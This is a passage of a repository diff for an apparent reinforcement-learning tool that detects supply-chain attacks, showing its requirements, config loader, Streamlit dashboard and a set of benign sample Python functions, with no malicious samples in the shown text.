J --> K[11. README.md]
|
| 277 |
+
```
|
requirements.txt
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
gymnasium>=0.29.0
|
| 2 |
+
docker>=7.0.0
|
| 3 |
+
streamlit>=1.30.0
|
| 4 |
+
unsloth>=2024.0
|
| 5 |
+
trl>=0.7.0
|
| 6 |
+
transformers>=4.38.0
|
| 7 |
+
torch>=2.1.0
|
| 8 |
+
wandb>=0.16.0
|
| 9 |
+
pytest>=8.0.0
|
| 10 |
+
peft>=0.8.0
|
| 11 |
+
datasets>=2.16.0
|
| 12 |
+
python-dotenv>=1.0.0
|
| 13 |
+
PyYAML>=6.0
|
| 14 |
+
synthetic-data-kit>=0.1.0
|
| 15 |
+
vllm-python-client>=0.1.0
|
sentinel_synth/__init__.py
ADDED
|
File without changes
|
sentinel_synth/config.py
ADDED
|
@@ -0,0 +1,80 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Centralized configuration loader for Sentinel-Synth.
|
| 3 |
+
|
| 4 |
+
Loads:
|
| 5 |
+
- .env → ENV dict (model names, API keys, secrets)
|
| 6 |
+
- config.yaml → CFG dict (training hyperparameters, paths)
|
| 7 |
+
|
| 8 |
+
Usage:
|
| 9 |
+
from sentinel_synth.config import ENV, CFG
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import os
|
| 13 |
+
import yaml
|
| 14 |
+
from pathlib import Path
|
| 15 |
+
|
| 16 |
+
# ---------- .env loading (no external dependency) ----------
|
| 17 |
+
def _load_dotenv(path: str):
|
| 18 |
+
"""Minimal .env parser — avoids requiring python-dotenv at import time."""
|
| 19 |
+
env = {}
|
| 20 |
+
if not os.path.exists(path):
|
| 21 |
+
return env
|
| 22 |
+
with open(path) as f:
|
| 23 |
+
for line in f:
|
| 24 |
+
line = line.strip()
|
| 25 |
+
if not line or line.startswith("#"):
|
| 26 |
+
continue
|
| 27 |
+
if "=" in line:
|
| 28 |
+
key, _, value = line.partition("=")
|
| 29 |
+
key = key.strip()
|
| 30 |
+
value = value.strip()
|
| 31 |
+
env[key] = value
|
| 32 |
+
# Also set in os.environ so downstream libs (wandb) pick it up
|
| 33 |
+
if value:
|
| 34 |
+
os.environ.setdefault(key, value)
|
| 35 |
+
return env
|
| 36 |
+
|
| 37 |
+
# Resolve project root (two levels up from this file)
|
| 38 |
+
_PROJECT_ROOT = Path(__file__).resolve().parent.parent
|
| 39 |
+
_dotenv_raw = _load_dotenv(str(_PROJECT_ROOT / ".env"))
|
| 40 |
+
|
| 41 |
+
ENV = {
|
| 42 |
+
"SYNTH_GENERATOR_MODEL": os.getenv("SYNTH_GENERATOR_MODEL", _dotenv_raw.get("SYNTH_GENERATOR_MODEL", "meta-llama/Llama-3.2-3B-Instruct")),
|
| 43 |
+
"GRPO_POLICY_MODEL": os.getenv("GRPO_POLICY_MODEL", _dotenv_raw.get("GRPO_POLICY_MODEL", "unsloth/Qwen2.5-Coder-7B-Instruct")),
|
| 44 |
+
"WANDB_API_KEY": os.getenv("WANDB_API_KEY", _dotenv_raw.get("WANDB_API_KEY", "")),
|
| 45 |
+
"WANDB_PROJECT": os.getenv("WANDB_PROJECT", _dotenv_raw.get("WANDB_PROJECT", "sentinel-synth")),
|
| 46 |
+
"WANDB_RUN_NAME": os.getenv("WANDB_RUN_NAME", _dotenv_raw.get("WANDB_RUN_NAME", "grpo-qwen-coder-7b")),
|
| 47 |
+
}
|
| 48 |
+
|
| 49 |
+
# ---------- config.yaml loading ----------
|
| 50 |
+
_config_path = _PROJECT_ROOT / "config.yaml"
|
| 51 |
+
if _config_path.exists():
|
| 52 |
+
with open(_config_path) as f:
|
| 53 |
+
CFG = yaml.safe_load(f)
|
| 54 |
+
else:
|
| 55 |
+
CFG = {
|
| 56 |
+
"data_generation": {
|
| 57 |
+
"num_samples": 10,
|
| 58 |
+
"output_format": "json",
|
| 59 |
+
"benign_dir": "sentinel_synth/data/benign/",
|
| 60 |
+
"scenarios_output": "sentinel_synth/data/scenarios.json",
|
| 61 |
+
"sdk_config": "sentinel_synth/data/sdk_config.yaml",
|
| 62 |
+
},
|
| 63 |
+
"training": {
|
| 64 |
+
"learning_rate": 1e-6,
|
| 65 |
+
"group_size": 4,
|
| 66 |
+
"max_seq_len": 1024,
|
| 67 |
+
"max_steps": 100,
|
| 68 |
+
"gradient_accumulation_steps": 4,
|
| 69 |
+
"ppo_clip_eps": 0.2,
|
| 70 |
+
"lora_r": 16,
|
| 71 |
+
"lora_alpha": 16,
|
| 72 |
+
"lora_dropout": 0,
|
| 73 |
+
"output_dir": "grpo_lora",
|
| 74 |
+
},
|
| 75 |
+
"environment": {
|
| 76 |
+
"max_steps": 5,
|
| 77 |
+
"use_docker": False,
|
| 78 |
+
"sandbox_timeout_sec": 5,
|
| 79 |
+
},
|
| 80 |
+
}
|
sentinel_synth/dashboard/__init__.py
ADDED
|
File without changes
|
sentinel_synth/dashboard/app.py
ADDED
|
@@ -0,0 +1,169 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import streamlit as st
|
| 2 |
+
import json
|
| 3 |
+
import time
|
| 4 |
+
|
| 5 |
+
from sentinel_synth.envs.sentinel_env import SentinelEnv
|
| 6 |
+
|
| 7 |
+
st.set_page_config(
|
| 8 |
+
page_title="Sentinel-Synth Dashboard",
|
| 9 |
+
page_icon="🛡️",
|
| 10 |
+
layout="wide",
|
| 11 |
+
initial_sidebar_state="expanded",
|
| 12 |
+
)
|
| 13 |
+
|
| 14 |
+
# Custom CSS for Cobalt Blue theming and dark mode
|
| 15 |
+
st.markdown("""
|
| 16 |
+
<style>
|
| 17 |
+
:root {
|
| 18 |
+
--cobalt-blue: #0047AB;
|
| 19 |
+
--cobalt-light: #2A6DC9;
|
| 20 |
+
--cobalt-dark: #002255;
|
| 21 |
+
}
|
| 22 |
+
.stApp {
|
| 23 |
+
background-color: #0d1117;
|
| 24 |
+
color: #c9d1d9;
|
| 25 |
+
}
|
| 26 |
+
.css-1d391kg {
|
| 27 |
+
background-color: #161b22;
|
| 28 |
+
}
|
| 29 |
+
/* Headers */
|
| 30 |
+
h1, h2, h3 {
|
| 31 |
+
color: #58a6ff !important;
|
| 32 |
+
}
|
| 33 |
+
/* Sidebar */
|
| 34 |
+
.css-1lcbmhc {
|
| 35 |
+
background-color: #161b22;
|
| 36 |
+
}
|
| 37 |
+
/* Buttons */
|
| 38 |
+
.stButton>button {
|
| 39 |
+
background-color: var(--cobalt-blue);
|
| 40 |
+
color: white;
|
| 41 |
+
border: none;
|
| 42 |
+
border-radius: 4px;
|
| 43 |
+
transition: 0.3s;
|
| 44 |
+
}
|
| 45 |
+
.stButton>button:hover {
|
| 46 |
+
background-color: var(--cobalt-light);
|
| 47 |
+
border: none;
|
| 48 |
+
color: white;
|
| 49 |
+
}
|
| 50 |
+
/* Info box */
|
| 51 |
+
.info-box {
|
| 52 |
+
background-color: #1c2128;
|
| 53 |
+
border-left: 4px solid var(--cobalt-blue);
|
| 54 |
+
padding: 1rem;
|
| 55 |
+
border-radius: 0.25rem;
|
| 56 |
+
margin-bottom: 1rem;
|
| 57 |
+
}
|
| 58 |
+
|
| 59 |
+
.status-malicious { color: #ff7b72; font-weight: bold; }
|
| 60 |
+
.status-benign { color: #3fb950; font-weight: bold; }
|
| 61 |
+
.status-patched { color: #79c0ff; font-weight: bold; }
|
| 62 |
+
</style>
|
| 63 |
+
""", unsafe_allow_html=True)
|
| 64 |
+
|
| 65 |
+
@st.cache_resource
|
| 66 |
+
def get_env():
|
| 67 |
+
return SentinelEnv(use_docker=False)
|
| 68 |
+
|
| 69 |
+
def main():
|
| 70 |
+
st.title("🛡️ Sentinel-Synth | GRPO DevSecOps Agent")
|
| 71 |
+
st.markdown("Supply-chain attack detection and auto-patching platform via Reinforcement Learning.")
|
| 72 |
+
|
| 73 |
+
env = get_env()
|
| 74 |
+
|
| 75 |
+
with st.sidebar:
|
| 76 |
+
st.header("Control Panel")
|
| 77 |
+
mode = st.radio("Mode", ["Demo Scenarios", "Custom Code"])
|
| 78 |
+
run_docker = st.checkbox("Use Docker Sandbox", value=False)
|
| 79 |
+
st.markdown("---")
|
| 80 |
+
st.markdown("**W&B Run:** [View Logs](https://wandb.ai)")
|
| 81 |
+
st.markdown("**LLM Adapter:** `grpo_lora_qwen`")
|
| 82 |
+
|
| 83 |
+
env.use_docker = run_docker
|
| 84 |
+
|
| 85 |
+
if mode == "Demo Scenarios":
|
| 86 |
+
col1, col2 = st.columns([1, 1])
|
| 87 |
+
with col1:
|
| 88 |
+
if st.button("Load Malicious Example"):
|
| 89 |
+
malicious = [s for s in env.scenarios if s["label"] == "malicious"]
|
| 90 |
+
if malicious:
|
| 91 |
+
st.session_state["code"] = malicious[0]["code_snippet"]
|
| 92 |
+
st.session_state["scenario"] = malicious[0]
|
| 93 |
+
|
| 94 |
+
with col2:
|
| 95 |
+
if st.button("Load Benign Example"):
|
| 96 |
+
benign = [s for s in env.scenarios if s["label"] == "benign"]
|
| 97 |
+
if benign:
|
| 98 |
+
st.session_state["code"] = benign[0]["code_snippet"]
|
| 99 |
+
st.session_state["scenario"] = benign[0]
|
| 100 |
+
|
| 101 |
+
code_input = st.text_area("Python Code Snippet", value=st.session_state.get("code", ""), height=300)
|
| 102 |
+
|
| 103 |
+
if st.button("Analyze & Diffuse"):
|
| 104 |
+
if not code_input:
|
| 105 |
+
st.warning("Please provide code to analyze.")
|
| 106 |
+
return
|
| 107 |
+
|
| 108 |
+
scenario = st.session_state.get("scenario")
|
| 109 |
+
if mode == "Custom Code" or not scenario or scenario["code_snippet"] != code_input:
|
| 110 |
+
scenario = {
|
| 111 |
+
"id": "custom",
|
| 112 |
+
"label": "unknown",
|
| 113 |
+
"type": "custom",
|
| 114 |
+
"code_snippet": code_input,
|
| 115 |
+
"patch": None
|
| 116 |
+
}
|
| 117 |
+
|
| 118 |
+
with st.spinner("Agent computing actions in OpenEnv..."):
|
| 119 |
+
obs, _ = env.reset(options={"scenario": scenario})
|
| 120 |
+
|
| 121 |
+
# Dummy policy for UI demonstration since we don't load the real adapter here yet
|
| 122 |
+
time.sleep(1)
|
| 123 |
+
risk = obs["risk_score"][0]
|
| 124 |
+
action = env.ACTION_SUBMIT_PATCH if risk > 0.4 and scenario.get("patch") else env.ACTION_ANALYZE
|
| 125 |
+
|
| 126 |
+
# If merely analyzed, let's step once more to see what we do
|
| 127 |
+
if action == env.ACTION_ANALYZE:
|
| 128 |
+
obs, reward, done, _, info = env.step(action)
|
| 129 |
+
action = env.ACTION_BLOCK_PR if risk > 0.6 else env.ACTION_REQUEST_REVIEW
|
| 130 |
+
|
| 131 |
+
obs, reward, done, _, info = env.step(action)
|
| 132 |
+
|
| 133 |
+
st.subheader("Agent Report")
|
| 134 |
+
|
| 135 |
+
c1, c2, c3 = st.columns(3)
|
| 136 |
+
c1.metric("Component Risk Score", f"{risk:.2f}", delta_color="inverse", delta=f"{risk-0.2:.2f}")
|
| 137 |
+
action_names = ["ANALYZE", "SANDBOX", "BLOCK", "PATCH", "REVIEW"]
|
| 138 |
+
c2.metric("Agent Action Taken", action_names[action])
|
| 139 |
+
c3.metric("Reward Received", f"{reward:+.2f}")
|
| 140 |
+
|
| 141 |
+
# Display tabs for detailed results
|
| 142 |
+
tab1, tab2, tab3 = st.tabs(["Action Details", "Sandbox Telemetry", "Patch Proposal"])
|
| 143 |
+
|
| 144 |
+
with tab1:
|
| 145 |
+
if action == env.ACTION_BLOCK_PR:
|
| 146 |
+
st.markdown("<div class='info-box status-malicious'>Action: BLOCKED. Vulnerability detected and no patch available.</div>", unsafe_allow_html=True)
|
| 147 |
+
elif action == env.ACTION_SUBMIT_PATCH:
|
| 148 |
+
st.markdown("<div class='info-box status-patched'>Action: PATCH SUBMITTED. Vulnerability neutralized.</div>", unsafe_allow_html=True)
|
| 149 |
+
st.json(info)
|
| 150 |
+
else:
|
| 151 |
+
st.markdown("<div class='info-box status-benign'>Action: REVIEW / ANALYZE. Code appears nominally safe or requires human review.</div>", unsafe_allow_html=True)
|
| 152 |
+
|
| 153 |
+
with tab2:
|
| 154 |
+
st.markdown("**(Telemetry simulates background execution for static code)**")
|
| 155 |
+
if "telemetry" in info:
|
| 156 |
+
st.json(info["telemetry"])
|
| 157 |
+
else:
|
| 158 |
+
st.info("No sandbox execution triggered for this path.")
|
| 159 |
+
|
| 160 |
+
with tab3:
|
| 161 |
+
if action == env.ACTION_SUBMIT_PATCH and scenario.get("patch"):
|
| 162 |
+
st.code(scenario["patch"], language='python')
|
| 163 |
+
if info.get("validation_success"):
|
| 164 |
+
st.success("Patch passed 3-stage validation pipeline!")
|
| 165 |
+
else:
|
| 166 |
+
st.info("No patch generated.")
|
| 167 |
+
|
| 168 |
+
if __name__ == "__main__":
|
| 169 |
+
main()
|
sentinel_synth/data/__init__.py
ADDED
|
File without changes
|
sentinel_synth/data/benign/ds_binarysearch.py
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def binary_search(arr, target):
|
| 2 |
+
"""Perform binary search."""
|
| 3 |
+
low = 0
|
| 4 |
+
high = len(arr) - 1
|
| 5 |
+
while low <= high:
|
| 6 |
+
mid = (low + high) // 2
|
| 7 |
+
if arr[mid] == target:
|
| 8 |
+
return mid
|
| 9 |
+
elif arr[mid] < target:
|
| 10 |
+
low = mid + 1
|
| 11 |
+
else:
|
| 12 |
+
high = mid - 1
|
| 13 |
+
return -1
|
sentinel_synth/data/benign/ds_linkedlist.py
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
class Node:
|
| 2 |
+
def __init__(self, data):
|
| 3 |
+
self.data = data
|
| 4 |
+
self.next = None
|
| 5 |
+
|
| 6 |
+
class LinkedList:
|
| 7 |
+
"""A simple linked list."""
|
| 8 |
+
def __init__(self):
|
| 9 |
+
self.head = None
|
| 10 |
+
|
| 11 |
+
def append(self, data):
|
| 12 |
+
new_node = Node(data)
|
| 13 |
+
if not self.head:
|
| 14 |
+
self.head = new_node
|
| 15 |
+
return
|
| 16 |
+
last = self.head
|
| 17 |
+
while last.next:
|
| 18 |
+
last = last.next
|
| 19 |
+
last.next = new_node
|
sentinel_synth/data/benign/ds_queue.py
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
class Queue:
|
| 2 |
+
"""A simple queue implementation."""
|
| 3 |
+
def __init__(self):
|
| 4 |
+
self.items = []
|
| 5 |
+
|
| 6 |
+
def enqueue(self, item):
|
| 7 |
+
self.items.insert(0, item)
|
| 8 |
+
|
| 9 |
+
def dequeue(self):
|
| 10 |
+
if not self.is_empty():
|
| 11 |
+
return self.items.pop()
|
| 12 |
+
return None
|
| 13 |
+
|
| 14 |
+
def is_empty(self):
|
| 15 |
+
return len(self.items) == 0
|
sentinel_synth/data/benign/ds_sorting.py
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def bubble_sort(arr):
|
| 2 |
+
"""Sort an array using bubble sort."""
|
| 3 |
+
n = len(arr)
|
| 4 |
+
for i in range(n):
|
| 5 |
+
for j in range(0, n-i-1):
|
| 6 |
+
if arr[j] > arr[j+1]:
|
| 7 |
+
arr[j], arr[j+1] = arr[j+1], arr[j]
|
| 8 |
+
return arr
|
sentinel_synth/data/benign/ds_stack.py
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
class Stack:
|
| 2 |
+
"""A simple stack implementation."""
|
| 3 |
+
def __init__(self):
|
| 4 |
+
self.items = []
|
| 5 |
+
|
| 6 |
+
def push(self, item):
|
| 7 |
+
self.items.append(item)
|
| 8 |
+
|
| 9 |
+
def pop(self):
|
| 10 |
+
if not self.is_empty():
|
| 11 |
+
return self.items.pop()
|
| 12 |
+
return None
|
| 13 |
+
|
| 14 |
+
def is_empty(self):
|
| 15 |
+
return len(self.items) == 0
|
sentinel_synth/data/benign/io_config.py
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def read_ini_config(content):
|
| 2 |
+
"""Read a simple INI configuration."""
|
| 3 |
+
config = {}
|
| 4 |
+
current_section = None
|
| 5 |
+
for line in content.split('\n'):
|
| 6 |
+
line = line.strip()
|
| 7 |
+
if not line or line.startswith('#'):
|
| 8 |
+
continue
|
| 9 |
+
if line.startswith('[') and line.endswith(']'):
|
| 10 |
+
current_section = line[1:-1]
|
| 11 |
+
config[current_section] = {}
|
| 12 |
+
elif '=' in line and current_section:
|
| 13 |
+
key, val = line.split('=', 1)
|
| 14 |
+
config[current_section][key.strip()] = val.strip()
|
| 15 |
+
return config
|
sentinel_synth/data/benign/io_csv.py
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def parse_csv(csv_content):
|
| 2 |
+
"""Parse simple CSV content."""
|
| 3 |
+
lines = csv_content.strip().split('\n')
|
| 4 |
+
if not lines:
|
| 5 |
+
return []
|
| 6 |
+
headers = lines[0].split(',')
|
| 7 |
+
result = []
|
| 8 |
+
for line in lines[1:]:
|
| 9 |
+
values = line.split(',')
|
| 10 |
+
result.append(dict(zip(headers, values)))
|
| 11 |
+
return result
|
sentinel_synth/data/benign/io_json.py
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
import json
|
| 2 |
+
|
| 3 |
+
def format_json(obj):
|
| 4 |
+
"""Format dictionary as readable JSON string."""
|
| 5 |
+
return json.dumps(obj, indent=4, sort_keys=True)
|
sentinel_synth/data/benign/io_log.py
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def parse_logs(log_lines):
|
| 2 |
+
"""Parse simple log lines into level and message."""
|
| 3 |
+
parsed = []
|
| 4 |
+
for line in log_lines:
|
| 5 |
+
parts = line.split(' - ', 1)
|
| 6 |
+
if len(parts) == 2:
|
| 7 |
+
parsed.append({"level": parts[0].strip('[]'), "message": parts[1]})
|
| 8 |
+
return parsed
|
sentinel_synth/data/benign/io_template.py
ADDED
|
@@ -0,0 +1,6 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def render_template(template, context):
|
| 2 |
+
"""Simple template rendering replacing {{key}}."""
|
| 3 |
+
result = template
|
| 4 |
+
for key, value in context.items():
|
| 5 |
+
result = result.replace(f"{{{{{key}}}}}", str(value))
|
| 6 |
+
return result
|
sentinel_synth/data/benign/math_factorial.py
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def factorial(n):
|
| 2 |
+
"""Calculate the factorial of a number."""
|
| 3 |
+
if n == 0:
|
| 4 |
+
return 1
|
| 5 |
+
return n * factorial(n - 1)
|
sentinel_synth/data/benign/math_fibonacci.py
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def fibonacci(n):
|
| 2 |
+
"""Return the nth Fibonacci number."""
|
| 3 |
+
if n <= 0:
|
| 4 |
+
return 0
|
| 5 |
+
elif n == 1:
|
| 6 |
+
return 1
|
| 7 |
+
return fibonacci(n - 1) + fibonacci(n - 2)
|
sentinel_synth/data/benign/math_gcd.py
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def gcd(a, b):
|
| 2 |
+
"""Calculate the Greatest Common Divisor."""
|
| 3 |
+
while b:
|
| 4 |
+
a, b = b, a % b
|
| 5 |
+
return a
|
sentinel_synth/data/benign/math_matrix.py
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def matrix_addition(mat1, mat2):
|
| 2 |
+
"""Add two matrices."""
|
| 3 |
+
return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]
|
sentinel_synth/data/benign/math_prime.py
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def is_prime(n):
|
| 2 |
+
"""Check if a number is prime."""
|
| 3 |
+
if n <= 1:
|
| 4 |
+
return False
|
| 5 |
+
for i in range(2, int(n ** 0.5) + 1):
|
| 6 |
+
if n % i == 0:
|
| 7 |
+
return False
|
| 8 |
+
return True
|
sentinel_synth/data/benign/misc_calc.py
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def basic_calculator(a, b, op):
|
| 2 |
+
"""Perform a basic math operation."""
|
| 3 |
+
if op == '+':
|
| 4 |
+
return a + b
|
| 5 |
+
elif op == '-':
|
| 6 |
+
return a - b
|
| 7 |
+
elif op == '*':
|
| 8 |
+
return a * b
|
| 9 |
+
elif op == '/':
|
| 10 |
+
if b == 0:
|
| 11 |
+
raise ValueError("Division by zero")
|
| 12 |
+
return a / b
|
| 13 |
+
return None
|
sentinel_synth/data/benign/misc_date.py
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def format_iso_date(year, month, day):
|
| 2 |
+
"""Format date components into an ISO 8601 string."""
|
| 3 |
+
return f"{year:04d}-{month:02d}-{day:02d}"
|
sentinel_synth/data/benign/misc_password.py
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def is_strong_password(pwd):
|
| 2 |
+
"""Check if password meets basic strength criteria."""
|
| 3 |
+
if len(pwd) < 8:
|
| 4 |
+
return False
|
| 5 |
+
has_upper = any(c.isupper() for c in pwd)
|
| 6 |
+
has_lower = any(c.islower() for c in pwd)
|
| 7 |
+
has_digit = any(c.isdigit() for c in pwd)
|
| 8 |
+
return has_upper and has_lower and has_digit
|
sentinel_synth/data/benign/misc_temp.py
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def celsius_to_fahrenheit(c):
|
| 2 |
+
"""Convert Celsius to Fahrenheit."""
|
| 3 |
+
return (c * 9/5) + 32
|
| 4 |
+
|
| 5 |
+
def fahrenheit_to_celsius(f):
|
| 6 |
+
"""Convert Fahrenheit to Celsius."""
|
| 7 |
+
return (f - 32) * 5/9
|
sentinel_synth/data/benign/misc_url.py
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def parse_url_params(url):
|
| 2 |
+
"""Parse query parameters from a URL."""
|
| 3 |
+
if '?' not in url:
|
| 4 |
+
return {}
|
| 5 |
+
query = url.split('?', 1)[1]
|
| 6 |
+
params = {}
|
| 7 |
+
for pair in query.split('&'):
|
| 8 |
+
if '=' in pair:
|
| 9 |
+
k, v = pair.split('=', 1)
|
| 10 |
+
params[k] = v
|
| 11 |
+
return params
|
sentinel_synth/data/benign/str_anagram.py
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def is_anagram(s1, s2):
|
| 2 |
+
"""Check if two strings are anagrams."""
|
| 3 |
+
return sorted(s1.replace(" ", "").lower()) == sorted(s2.replace(" ", "").lower())
|
sentinel_synth/data/benign/str_caesar.py
ADDED
|
@@ -0,0 +1,10 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def caesar_cipher(text, shift):
|
| 2 |
+
"""Apply Caesar cipher to text."""
|
| 3 |
+
result = ""
|
| 4 |
+
for char in text:
|
| 5 |
+
if char.isalpha():
|
| 6 |
+
start = ord('a') if char.islower() else ord('A')
|
| 7 |
+
result += chr((ord(char) - start + shift) % 26 + start)
|
| 8 |
+
else:
|
| 9 |
+
result += char
|
| 10 |
+
return result
|
sentinel_synth/data/benign/str_palindrome.py
ADDED
|
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def is_palindrome(s):
|
| 2 |
+
"""Check if a string is a palindrome."""
|
| 3 |
+
cleaned = ''.join(c.lower() for c in s if c.isalnum())
|
| 4 |
+
return cleaned == cleaned[::-1]
|
sentinel_synth/data/benign/str_slug.py
ADDED
|
@@ -0,0 +1,6 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def generate_slug(title):
|
| 2 |
+
"""Generate a URL-friendly slug."""
|
| 3 |
+
import re
|
| 4 |
+
title = title.lower()
|
| 5 |
+
title = re.sub(r'[^a-z0-9\s-]', '', title)
|
| 6 |
+
return re.sub(r'[\s-]+', '-', title).strip('-')
|
sentinel_synth/data/benign/str_wordcount.py
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
def word_count(text):
|
| 2 |
+
"""Count occurrences of words in text."""
|
| 3 |
+
words = text.split()
|
| 4 |
+
